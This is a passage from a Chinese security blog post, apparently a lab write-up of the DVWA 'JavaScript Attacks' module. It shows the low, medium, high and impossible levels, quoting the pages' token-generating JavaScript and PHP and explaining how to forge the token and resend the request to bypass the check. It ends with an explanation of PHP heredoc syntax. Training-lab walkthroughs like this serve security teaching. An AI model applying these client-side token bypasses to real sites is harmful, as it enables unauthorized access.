    14. document.getElementById("token").value = md5(rot13(phrase));
    15. }
    16. generate_token();
    17. </script>
    18. EOF;
    19. ?>

    里面有生成md5的函数,rot13的函数,也有生成token的函数
    由此可知,token的生成是将phrase的值先进行rot13后再md5。结合index.php,要与md5(str_rot13("success")) 相等。
    打开控制台,依次把函数方法放进去,跑出md5值
    00759-hswmufbrvov.png
    82606-99d7010fhi.png
    生成token,再次重新发包
    90506-5irvegii5hq.png
    成功登录
    80551-0as8ne5tsunn.png

    medium

    index.php关键代码

    1. if ($token == strrev("XXsuccessXX")) {
    2. $message = "<p style='color:red'>Well done!</p>";
    3. } else {
    4. $message = "<p>Invalid token.</p>";
    5. }

    medium.php中进行了调用
    67494-3vo4yztzx9u.png
    跟进medium.js
    42811-2vj9qn0jwch.png
    可以看到token是如何生成的:
    do_someting()进行字符串反转
    setTimeout()300s后执行一次do_someting
    do_elsesomething()将倒转的值前后加实参和XX

    流程:
    每300毫秒执行一次,do_elsesometing函数,传入XX,token的值就等于XX+phrase的值+XX进行反转
    所以构造出
    75893-6wohhmqrbet.png
    构造出payload

    79999-yijsfeicfuq.png

    high

    去混淆后的代码
    在线去混淆网址http://deobfuscatejavascript.com/

    1. (function() {
    2. 'use strict';
    3. var ERROR = 'input is invalid type';
    4. var WINDOW = typeof window === 'object';
    5. var root = WINDOW ? window : {};
    6. if (root.JS_SHA256_NO_WINDOW) {
    7. WINDOW = false
    8. }
    9. var WEB_WORKER = !WINDOW && typeof self === 'object';
    10. var NODE_JS = !root.JS_SHA256_NO_NODE_JS && typeof process === 'object' && process.versions && process.versions.node;
    11. if (NODE_JS) {
    12. root = global
    13. } else if (WEB_WORKER) {
    14. root = self
    15. }
    16. var COMMON_JS = !root.JS_SHA256_NO_COMMON_JS && typeof module === 'object' && module.exports;
    17. var AMD = typeof define === 'function' && define.amd;
    18. var ARRAY_BUFFER = !root.JS_SHA256_NO_ARRAY_BUFFER && typeof ArrayBuffer !== 'undefined';
    19. var HEX_CHARS = '0123456789abcdef'.split('');
    20. var EXTRA = [-2147483648, 8388608, 32768, 128];
    21. var SHIFT = [24, 16, 8, 0];
    22. var K = [0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5, 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5, 0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3, 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174, 0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc, 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da, 0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7, 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967, 0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13, 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85, 0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3, 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070, 0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5, 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3, 0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208, 0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2];
    23. var OUTPUT_TYPES = ['hex', 'array', 'digest', 'arrayBuffer'];
    24. var blocks = [];
    25. if (root.JS_SHA256_NO_NODE_JS || !Array.isArray) {
    26. Array.isArray = function(obj) {
    27. return Object.prototype.toString.call(obj) === '[object Array]'
    28. }
    29. }
    30. if (ARRAY_BUFFER && (root.JS_SHA256_NO_ARRAY_BUFFER_IS_VIEW || !ArrayBuffer.isView)) {
    31. ArrayBuffer.isView = function(obj) {
    32. return typeof obj === 'object' && obj.buffer && obj.buffer.constructor === ArrayBuffer
    33. }
    34. }
    35. var createOutputMethod = function(outputType, is224) {
    36. return function(message) {
    37. return new Sha256(is224, true).update(message)[outputType]()
    38. }
    39. };
    40. var createMethod = function(is224) {
    41. var method = createOutputMethod('hex', is224);
    42. if (NODE_JS) {
    43. method = nodeWrap(method, is224)
    44. }
    45. method.create = function() {
    46. return new Sha256(is224)
    47. };
    48. method.update = function(message) {
    49. return method.create().update(message)
    50. };
    51. for (var i = 0; i < OUTPUT_TYPES.length; ++i) {
    52. var type = OUTPUT_TYPES[i];
    53. method[type] = createOutputMethod(type, is224)
    54. }
    55. return method
    56. };
    57. var nodeWrap = function(method, is224) {
    58. var crypto = eval("require('crypto')");
    59. var Buffer = eval("require('buffer').Buffer");
    60. var algorithm = is224 ? 'sha224' : 'sha256';
    61. var nodeMethod = function(message) {
    62. if (typeof message === 'string') {
    63. return crypto.createHash(algorithm).update(message, 'utf8').digest('hex')
    64. } else {
    65. if (message === null || message === undefined) {
    66. throw new Error(ERROR)
    67. } else if (message.constructor === ArrayBuffer) {
    68. message = new Uint8Array(message)
    69. }
    70. }
    71. if (Array.isArray(message) || ArrayBuffer.isView(message) || message.constructor === Buffer) {
    72. return crypto.createHash(algorithm).update(new Buffer(message)).digest('hex')
    73. } else {
    74. return method(message)
    75. }
    76. };
    77. return nodeMethod
    78. };
    79. var createHmacOutputMethod = function(outputType, is224) {
    80. return function(key, message) {
    81. return new HmacSha256(key, is224, true).update(message)[outputType]()
    82. }
    83. };
    84. var createHmacMethod = function(is224) {
    85. var method = createHmacOutputMethod('hex', is224);
    86. method.create = function(key) {
    87. return new HmacSha256(key, is224)
    88. };
    89. method.update = function(key, message) {
    90. return method.create(key).update(message)
    91. };
    92. for (var i = 0; i < OUTPUT_TYPES.length; ++i) {
    93. var type = OUTPUT_TYPES[i];
    94. method[type] = createHmacOutputMethod(type, is224)
    95. }
    96. return method
    97. };
    98. function Sha256(is224, sharedMemory) {
    99. if (sharedMemory) {
    100. blocks[0] = blocks[16] = blocks[1] = blocks[2] = blocks[3] = blocks[4] = blocks[5] = blocks[6] = blocks[7] = blocks[8] = blocks[9] = blocks[10] = blocks[11] = blocks[12] = blocks[13] = blocks[14] = blocks[15] = 0;
    101. this.blocks = blocks
    102. } else {
    103. this.blocks = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
    104. }
    105. if (is224) {
    106. this.h0 = 0xc1059ed8;
    107. this.h1 = 0x367cd507;
    108. this.h2 = 0x3070dd17;
    109. this.h3 = 0xf70e5939;
    110. this.h4 = 0xffc00b31;
    111. this.h5 = 0x68581511;
    112. this.h6 = 0x64f98fa7;
    113. this.h7 = 0xbefa4fa4
    114. } else {
    115. this.h0 = 0x6a09e667;
    116. this.h1 = 0xbb67ae85;
    117. this.h2 = 0x3c6ef372;
    118. this.h3 = 0xa54ff53a;
    119. this.h4 = 0x510e527f;
    120. this.h5 = 0x9b05688c;
    121. this.h6 = 0x1f83d9ab;
    122. this.h7 = 0x5be0cd19
    123. }
    124. this.block = this.start = this.bytes = this.hBytes = 0;
    125. this.finalized = this.hashed = false;
    126. this.first = true;
    127. this.is224 = is224
    128. }
    129. Sha256.prototype.update = function(message) {
    130. if (this.finalized) {
    131. return
    132. }
    133. var notString, type = typeof message;
    134. if (type !== 'string') {
    135. if (type === 'object') {
    136. if (message === null) {
    137. throw new Error(ERROR)
    138. } else if (ARRAY_BUFFER && message.constructor === ArrayBuffer) {
    139. message = new Uint8Array(message)
    140. } else if (!Array.isArray(message)) {
    141. if (!ARRAY_BUFFER || !ArrayBuffer.isView(message)) {
    142. throw new Error(ERROR)
    143. }
    144. }
    145. } else {
    146. throw new Error(ERROR)
    147. }
    148. notString = true
    149. }
    150. var code, index = 0,
    151. i, length = message.length,
    152. blocks = this.blocks;
    153. while (index < length) {
    154. if (this.hashed) {
    155. this.hashed = false;
    156. blocks[0] = this.block;
    157. blocks[16] = blocks[1] = blocks[2] = blocks[3] = blocks[4] = blocks[5] = blocks[6] = blocks[7] = blocks[8] = blocks[9] = blocks[10] = blocks[11] = blocks[12] = blocks[13] = blocks[14] = blocks[15] = 0
    158. }
    159. if (notString) {
    160. for (i = this.start; index < length && i < 64; ++index) {
    161. blocks[i >> 2] |= message[index] << SHIFT[i++ & 3]
    162. }
    163. } else {
    164. for (i = this.start; index < length && i < 64; ++index) {
    165. code = message.charCodeAt(index);
    166. if (code < 0x80) {
    167. blocks[i >> 2] |= code << SHIFT[i++ & 3]
    168. } else if (code < 0x800) {
    169. blocks[i >> 2] |= (0xc0 | (code >> 6)) << SHIFT[i++ & 3];
    170. blocks[i >> 2] |= (0x80 | (code & 0x3f)) << SHIFT[i++ & 3]
    171. } else if (code < 0xd800 || code >= 0xe000) {
    172. blocks[i >> 2] |= (0xe0 | (code >> 12)) << SHIFT[i++ & 3];
    173. blocks[i >> 2] |= (0x80 | ((code >> 6) & 0x3f)) << SHIFT[i++ & 3];
    174. blocks[i >> 2] |= (0x80 | (code & 0x3f)) << SHIFT[i++ & 3]
    175. } else {
    176. code = 0x10000 + (((code & 0x3ff) << 10) | (message.charCodeAt(++index) & 0x3ff));
    177. blocks[i >> 2] |= (0xf0 | (code >> 18)) << SHIFT[i++ & 3];
    178. blocks[i >> 2] |= (0x80 | ((code >> 12) & 0x3f)) << SHIFT[i++ & 3];
    179. blocks[i >> 2] |= (0x80 | ((code >> 6) & 0x3f)) << SHIFT[i++ & 3];
    180. blocks[i >> 2] |= (0x80 | (code & 0x3f)) << SHIFT[i++ & 3]
    181. }
    182. }
    183. }
    184. this.lastByteIndex = i;
    185. this.bytes += i - this.start;
    186. if (i >= 64) {
    187. this.block = blocks[16];
    188. this.start = i - 64;
    189. this.hash();
    190. this.hashed = true
    191. } else {
    192. this.start = i
    193. }
    194. }
    195. if (this.bytes > 4294967295) {
    196. this.hBytes += this.bytes / 4294967296 << 0;
    197. this.bytes = this.bytes % 4294967296
    198. }
    199. return this
    200. };
    201. Sha256.prototype.finalize = function() {
    202. if (this.finalized) {
    203. return
    204. }
    205. this.finalized = true;
    206. var blocks = this.blocks,
    207. i = this.lastByteIndex;
    208. blocks[16] = this.block;
    209. blocks[i >> 2] |= EXTRA[i & 3];
    210. this.block = blocks[16];
    211. if (i >= 56) {
    212. if (!this.hashed) {
    213. this.hash()
    214. }
    215. blocks[0] = this.block;
    216. blocks[16] = blocks[1] = blocks[2] = blocks[3] = blocks[4] = blocks[5] = blocks[6] = blocks[7] = blocks[8] = blocks[9] = blocks[10] = blocks[11] = blocks[12] = blocks[13] = blocks[14] = blocks[15] = 0
    217. }
    218. blocks[14] = this.hBytes << 3 | this.bytes >>> 29;
    219. blocks[15] = this.bytes << 3;
    220. this.hash()
    221. };
    222. Sha256.prototype.hash = function() {
    223. var a = this.h0,
    224. b = this.h1,
    225. c = this.h2,
    226. d = this.h3,
    227. e = this.h4,
    228. f = this.h5,
    229. g = this.h6,
    230. h = this.h7,
    231. blocks = this.blocks,
    232. j, s0, s1, maj, t1, t2, ch, ab, da, cd, bc;
    233. for (j = 16; j < 64; ++j) {
    234. t1 = blocks[j - 15];
    235. s0 = ((t1 >>> 7) | (t1 << 25)) ^ ((t1 >>> 18) | (t1 << 14)) ^ (t1 >>> 3);
    236. t1 = blocks[j - 2];
    237. s1 = ((t1 >>> 17) | (t1 << 15)) ^ ((t1 >>> 19) | (t1 << 13)) ^ (t1 >>> 10);
    238. blocks[j] = blocks[j - 16] + s0 + blocks[j - 7] + s1 << 0
    239. }
    240. bc = b & c;
    241. for (j = 0; j < 64; j += 4) {
    242. if (this.first) {
    243. if (this.is224) {
    244. ab = 300032;
    245. t1 = blocks[0] - 1413257819;
    246. h = t1 - 150054599 << 0;
    247. d = t1 + 24177077 << 0
    248. } else {
    249. ab = 704751109;
    250. t1 = blocks[0] - 210244248;
    251. h = t1 - 1521486534 << 0;
    252. d = t1 + 143694565 << 0
    253. }
    254. this.first = false
    255. } else {
    256. s0 = ((a >>> 2) | (a << 30)) ^ ((a >>> 13) | (a << 19)) ^ ((a >>> 22) | (a << 10));
    257. s1 = ((e >>> 6) | (e << 26)) ^ ((e >>> 11) | (e << 21)) ^ ((e >>> 25) | (e << 7));
    258. ab = a & b;
    259. maj = ab ^ (a & c) ^ bc;
    260. ch = (e & f) ^ (~e & g);
    261. t1 = h + s1 + ch + K[j] + blocks[j];
    262. t2 = s0 + maj;
    263. h = d + t1 << 0;
    264. d = t1 + t2 << 0
    265. }
    266. s0 = ((d >>> 2) | (d << 30)) ^ ((d >>> 13) | (d << 19)) ^ ((d >>> 22) | (d << 10));
    267. s1 = ((h >>> 6) | (h << 26)) ^ ((h >>> 11) | (h << 21)) ^ ((h >>> 25) | (h << 7));
    268. da = d & a;
    269. maj = da ^ (d & b) ^ ab;
    270. ch = (h & e) ^ (~h & f);
    271. t1 = g + s1 + ch + K[j + 1] + blocks[j + 1];
    272. t2 = s0 + maj;
    273. g = c + t1 << 0;
    274. c = t1 + t2 << 0;
    275. s0 = ((c >>> 2) | (c << 30)) ^ ((c >>> 13) | (c << 19)) ^ ((c >>> 22) | (c << 10));
    276. s1 = ((g >>> 6) | (g << 26)) ^ ((g >>> 11) | (g << 21)) ^ ((g >>> 25) | (g << 7));
    277. cd = c & d;
    278. maj = cd ^ (c & a) ^ da;
    279. ch = (g & h) ^ (~g & e);
    280. t1 = f + s1 + ch + K[j + 2] + blocks[j + 2];
    281. t2 = s0 + maj;
    282. f = b + t1 << 0;
    283. b = t1 + t2 << 0;
    284. s0 = ((b >>> 2) | (b << 30)) ^ ((b >>> 13) | (b << 19)) ^ ((b >>> 22) | (b << 10));
    285. s1 = ((f >>> 6) | (f << 26)) ^ ((f >>> 11) | (f << 21)) ^ ((f >>> 25) | (f << 7));
    286. bc = b & c;
    287. maj = bc ^ (b & d) ^ cd;
    288. ch = (f & g) ^ (~f & h);
    289. t1 = e + s1 + ch + K[j + 3] + blocks[j + 3];
    290. t2 = s0 + maj;
    291. e = a + t1 << 0;
    292. a = t1 + t2 << 0
    293. }
    294. this.h0 = this.h0 + a << 0;
    295. this.h1 = this.h1 + b << 0;
    296. this.h2 = this.h2 + c << 0;
    297. this.h3 = this.h3 + d << 0;
    298. this.h4 = this.h4 + e << 0;
    299. this.h5 = this.h5 + f << 0;
    300. this.h6 = this.h6 + g << 0;
    301. this.h7 = this.h7 + h << 0
    302. };
    303. Sha256.prototype.hex = function() {
    304. this.finalize();
    305. var h0 = this.h0,
    306. h1 = this.h1,
    307. h2 = this.h2,
    308. h3 = this.h3,
    309. h4 = this.h4,
    310. h5 = this.h5,
    311. h6 = this.h6,
    312. h7 = this.h7;
    313. var hex = HEX_CHARS[(h0 >> 28) & 0x0F] + HEX_CHARS[(h0 >> 24) & 0x0F] + HEX_CHARS[(h0 >> 20) & 0x0F] + HEX_CHARS[(h0 >> 16) & 0x0F] + HEX_CHARS[(h0 >> 12) & 0x0F] + HEX_CHARS[(h0 >> 8) & 0x0F] + HEX_CHARS[(h0 >> 4) & 0x0F] + HEX_CHARS[h0 & 0x0F] + HEX_CHARS[(h1 >> 28) & 0x0F] + HEX_CHARS[(h1 >> 24) & 0x0F] + HEX_CHARS[(h1 >> 20) & 0x0F] + HEX_CHARS[(h1 >> 16) & 0x0F] + HEX_CHARS[(h1 >> 12) & 0x0F] + HEX_CHARS[(h1 >> 8) & 0x0F] + HEX_CHARS[(h1 >> 4) & 0x0F] + HEX_CHARS[h1 & 0x0F] + HEX_CHARS[(h2 >> 28) & 0x0F] + HEX_CHARS[(h2 >> 24) & 0x0F] + HEX_CHARS[(h2 >> 20) & 0x0F] + HEX_CHARS[(h2 >> 16) & 0x0F] + HEX_CHARS[(h2 >> 12) & 0x0F] + HEX_CHARS[(h2 >> 8) & 0x0F] + HEX_CHARS[(h2 >> 4) & 0x0F] + HEX_CHARS[h2 & 0x0F] + HEX_CHARS[(h3 >> 28) & 0x0F] + HEX_CHARS[(h3 >> 24) & 0x0F] + HEX_CHARS[(h3 >> 20) & 0x0F] + HEX_CHARS[(h3 >> 16) & 0x0F] + HEX_CHARS[(h3 >> 12) & 0x0F] + HEX_CHARS[(h3 >> 8) & 0x0F] + HEX_CHARS[(h3 >> 4) & 0x0F] + HEX_CHARS[h3 & 0x0F] + HEX_CHARS[(h4 >> 28) & 0x0F] + HEX_CHARS[(h4 >> 24) & 0x0F] + HEX_CHARS[(h4 >> 20) & 0x0F] + HEX_CHARS[(h4 >> 16) & 0x0F] + HEX_CHARS[(h4 >> 12) & 0x0F] + HEX_CHARS[(h4 >> 8) & 0x0F] + HEX_CHARS[(h4 >> 4) & 0x0F] + HEX_CHARS[h4 & 0x0F] + HEX_CHARS[(h5 >> 28) & 0x0F] + HEX_CHARS[(h5 >> 24) & 0x0F] + HEX_CHARS[(h5 >> 20) & 0x0F] + HEX_CHARS[(h5 >> 16) & 0x0F] + HEX_CHARS[(h5 >> 12) & 0x0F] + HEX_CHARS[(h5 >> 8) & 0x0F] + HEX_CHARS[(h5 >> 4) & 0x0F] + HEX_CHARS[h5 & 0x0F] + HEX_CHARS[(h6 >> 28) & 0x0F] + HEX_CHARS[(h6 >> 24) & 0x0F] + HEX_CHARS[(h6 >> 20) & 0x0F] + HEX_CHARS[(h6 >> 16) & 0x0F] + HEX_CHARS[(h6 >> 12) & 0x0F] + HEX_CHARS[(h6 >> 8) & 0x0F] + HEX_CHARS[(h6 >> 4) & 0x0F] + HEX_CHARS[h6 & 0x0F];
    314. if (!this.is224) {
    315. hex += HEX_CHARS[(h7 >> 28) & 0x0F] + HEX_CHARS[(h7 >> 24) & 0x0F] + HEX_CHARS[(h7 >> 20) & 0x0F] + HEX_CHARS[(h7 >> 16) & 0x0F] + HEX_CHARS[(h7 >> 12) & 0x0F] + HEX_CHARS[(h7 >> 8) & 0x0F] + HEX_CHARS[(h7 >> 4) & 0x0F] + HEX_CHARS[h7 & 0x0F]
    316. }
    317. return hex
    318. };
    319. Sha256.prototype.toString = Sha256.prototype.hex;
    320. Sha256.prototype.digest = function() {
    321. this.finalize();
    322. var h0 = this.h0,
    323. h1 = this.h1,
    324. h2 = this.h2,
    325. h3 = this.h3,
    326. h4 = this.h4,
    327. h5 = this.h5,
    328. h6 = this.h6,
    329. h7 = this.h7;
    330. var arr = [(h0 >> 24) & 0xFF, (h0 >> 16) & 0xFF, (h0 >> 8) & 0xFF, h0 & 0xFF, (h1 >> 24) & 0xFF, (h1 >> 16) & 0xFF, (h1 >> 8) & 0xFF, h1 & 0xFF, (h2 >> 24) & 0xFF, (h2 >> 16) & 0xFF, (h2 >> 8) & 0xFF, h2 & 0xFF, (h3 >> 24) & 0xFF, (h3 >> 16) & 0xFF, (h3 >> 8) & 0xFF, h3 & 0xFF, (h4 >> 24) & 0xFF, (h4 >> 16) & 0xFF, (h4 >> 8) & 0xFF, h4 & 0xFF, (h5 >> 24) & 0xFF, (h5 >> 16) & 0xFF, (h5 >> 8) & 0xFF, h5 & 0xFF, (h6 >> 24) & 0xFF, (h6 >> 16) & 0xFF, (h6 >> 8) & 0xFF, h6 & 0xFF];
    331. if (!this.is224) {
    332. arr.push((h7 >> 24) & 0xFF, (h7 >> 16) & 0xFF, (h7 >> 8) & 0xFF, h7 & 0xFF)
    333. }
    334. return arr
    335. };
    336. Sha256.prototype.array = Sha256.prototype.digest;
    337. Sha256.prototype.arrayBuffer = function() {
    338. this.finalize();
    339. var buffer = new ArrayBuffer(this.is224 ? 28 : 32);
    340. var dataView = new DataView(buffer);
    341. dataView.setUint32(0, this.h0);
    342. dataView.setUint32(4, this.h1);
    343. dataView.setUint32(8, this.h2);
    344. dataView.setUint32(12, this.h3);
    345. dataView.setUint32(16, this.h4);
    346. dataView.setUint32(20, this.h5);
    347. dataView.setUint32(24, this.h6);
    348. if (!this.is224) {
    349. dataView.setUint32(28, this.h7)
    350. }
    351. return buffer
    352. };
    353. function HmacSha256(key, is224, sharedMemory) {
    354. var i, type = typeof key;
    355. if (type === 'string') {
    356. var bytes = [],
    357. length = key.length,
    358. index = 0,
    359. code;
    360. for (i = 0; i < length; ++i) {
    361. code = key.charCodeAt(i);
    362. if (code < 0x80) {
    363. bytes[index++] = code
    364. } else if (code < 0x800) {
    365. bytes[index++] = (0xc0 | (code >> 6));
    366. bytes[index++] = (0x80 | (code & 0x3f))
    367. } else if (code < 0xd800 || code >= 0xe000) {
    368. bytes[index++] = (0xe0 | (code >> 12));
    369. bytes[index++] = (0x80 | ((code >> 6) & 0x3f));
    370. bytes[index++] = (0x80 | (code & 0x3f))
    371. } else {
    372. code = 0x10000 + (((code & 0x3ff) << 10) | (key.charCodeAt(++i) & 0x3ff));
    373. bytes[index++] = (0xf0 | (code >> 18));
    374. bytes[index++] = (0x80 | ((code >> 12) & 0x3f));
    375. bytes[index++] = (0x80 | ((code >> 6) & 0x3f));
    376. bytes[index++] = (0x80 | (code & 0x3f))
    377. }
    378. }
    379. key = bytes
    380. } else {
    381. if (type === 'object') {
    382. if (key === null) {
    383. throw new Error(ERROR)
    384. } else if (ARRAY_BUFFER && key.constructor === ArrayBuffer) {
    385. key = new Uint8Array(key)
    386. } else if (!Array.isArray(key)) {
    387. if (!ARRAY_BUFFER || !ArrayBuffer.isView(key)) {
    388. throw new Error(ERROR)
    389. }
    390. }
    391. } else {
    392. throw new Error(ERROR)
    393. }
    394. }
    395. if (key.length > 64) {
    396. key = (new Sha256(is224, true)).update(key).array()
    397. }
    398. var oKeyPad = [],
    399. iKeyPad = [];
    400. for (i = 0; i < 64; ++i) {
    401. var b = key[i] || 0;
    402. oKeyPad[i] = 0x5c ^ b;
    403. iKeyPad[i] = 0x36 ^ b
    404. }
    405. Sha256.call(this, is224, sharedMemory);
    406. this.update(iKeyPad);
    407. this.oKeyPad = oKeyPad;
    408. this.inner = true;
    409. this.sharedMemory = sharedMemory
    410. }
    411. HmacSha256.prototype = new Sha256();
    412. HmacSha256.prototype.finalize = function() {
    413. Sha256.prototype.finalize.call(this);
    414. if (this.inner) {
    415. this.inner = false;
    416. var innerHash = this.array();
    417. Sha256.call(this, this.is224, this.sharedMemory);
    418. this.update(this.oKeyPad);
    419. this.update(innerHash);
    420. Sha256.prototype.finalize.call(this)
    421. }
    422. };
    423. var exports = createMethod();
    424. exports.sha256 = exports;
    425. exports.sha224 = createMethod(true);
    426. exports.sha256.hmac = createHmacMethod();
    427. exports.sha224.hmac = createHmacMethod(true);
    428. if (COMMON_JS) {
    429. module.exports = exports
    430. } else {
    431. root.sha256 = exports.sha256;
    432. root.sha224 = exports.sha224;
    433. if (AMD) {
    434. define(function() {
    435. return exports
    436. })
    437. }
    438. }
    439. })();
    440. function do_something(e) {
    441. for (var t = "", n = e.length - 1; n >= 0; n--) t += e[n];
    442. return t
    443. }
    444. function token_part_3(t, y = "ZZ") {
    445. document.getElementById("token").value = sha256(document.getElementById("token").value + y)
    446. }
    447. function token_part_2(e = "YY") {
    448. document.getElementById("token").value = sha256(e + document.getElementById("token").value)
    449. }
    450. function token_part_1(a, b) {
    451. document.getElementById("token").value = do_something(document.getElementById("phrase").value)
    452. }
    453. document.getElementById("phrase").value = "";
    454. setTimeout(function() {
    455. token_part_2("XX")
    456. }, 300);
    457. document.getElementById("send").addEventListener("click", token_part_3);
    458. token_part_1("ABCD", 44);

    仔细看index的代码
    首先hash("sha256", "XX" . strrev("success")),再拼接”ZZ”后再次md5
    这里没仔细看,卡我半天
    大草
    看js中如何构造的token
    首先其通过document.getElementById("phrase").value = ""; 将phrase的值清空
    执行token_part_1("ABCD", 44);就仅仅将phrase的值进行反转
    每300秒,token将由token_part_2("XX")进行构造,就是sha256 XX+传入的token的值
    点击send, 调用token_part_3,不加括号表指针。

    可以看出和后台的验证不同,构造符合的token

    09650-c896lsp81o.png
    25862-hehig83xzoh.png
    成功绕过

    impossible

    关键代码

    1. if ( $_COOKIE[ 'security' ] == "impossible" ) {
    2. $page[ 'body' ] = <<<EOF
    3. <div class="body_padded">
    4. <h1>Vulnerability: JavaScript Attacks</h1>
    5. <div class="vulnerable_code_area">
    6. <p>
    7. You can never trust anything that comes from the user or prevent them from messing with it and so there is no impossible level.
    8. </p>
    9. EOF;
    10. } else {
    11. $page[ 'body' ] = <<<EOF
    12. <div class="body_padded">
    13. <h1>Vulnerability: JavaScript Attacks</h1>
    14. <div class="vulnerable_code_area">
    15. <p>
    16. Submit the word "success" to win.
    17. </p>
    18. $message
    19. <form name="low_js" method="post">
    20. <input type="hidden" name="token" value="" id="token" />
    21. <label for="phrase">Phrase</label> <input type="text" name="phrase" value="ChangeMe" id="phrase" />
    22. <input type="submit" id="send" name="send" value="Submit" />
    23. </form>
    24. EOF;
    25. }
    26. require_once DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/javascript/source/{$vulnerabilityFile}";
    27. $page[ 'body' ] .= <<<EOF
    28. </div>
    29. EOF;
    30. $page[ 'body' ] .= "
    31. <h2>More Information</h2>
    32. <ul>
    33. <li>" . dvwaExternalLinkUrlGet( 'https://www.w3schools.com/js/' ) . "</li>
    34. <li>" . dvwaExternalLinkUrlGet( 'https://www.youtube.com/watch?v=cs7EQdWO5o0&index=17&list=WL' ) . "</li>
    35. <li>" . dvwaExternalLinkUrlGet( 'https://ponyfoo.com/articles/es6-proxies-in-depth' ) . "</li>
    36. </ul>
    37. <p><i>Module developed by <a href='https://twitter.com/digininja'>Digininja</a>.</i></p>
    38. </div>\n";
    39. dvwaHtmlEcho( $page );

    php界定符 EOF的解释
    PHP是一个Web编程语言,在编程过程中难免会遇到用echo来输出大段的html和javascript脚本的情况,如果用传统的输出方法 ——按字符串输出的话,肯定要有大量的转义符来对字符串中的引号等特殊字符进行转义,以免出现语法错误。如果是一两处还可以容忍,但是要是一个完整的 html文本或者是一个200行的js我想是谁都会崩溃的。这就是PHP为什么要引入一个定界符的原因——至少一大部分原因是这样的。

    1.PHP定界符的作用就是按照原样,包括换行格式什么的,输出在其内部的东西;
    2.在PHP定界符中的任何特殊字符都不需要转义;
    3.PHP定界符中的PHP变量会被正常的用其值来替换。
    PHP中的定界符格式是这样的:
    <<<Eof
    ……
    Eof;
    _
    如:<?php
    $js = <<<eof
    <script type="text/javascript">
    //top:作用使得整个frameset都跳转
    window.top.location.href = "$group_url/Manager/login";
    </script>
    eof;
    echo $js;


    这波通过看代码发现,直接不给输入
    81216-u9fjyaf7v6r.png
    never trust anything that comes form the user or prevent them from messing with it
    那确实秀

    本文作者:硝基苯
    本文链接:https://www.c6sec.com/index.php/archives/340/
    最后修改时间:2022-03-24 16:57:38
    本站未注明转载的文章均为原创,并采用 CC BY-NC-SA 4.0 授权协议,转载请注明来源,谢谢!
    评论
    与本文无关评论请发留言板。请不要水评论,谢谢。
    textsms
    支持 Markdown 语法
    email
    link
    评论列表
    暂无评论
    文章如有不对指出,请联系斧正
    OK
    早上好!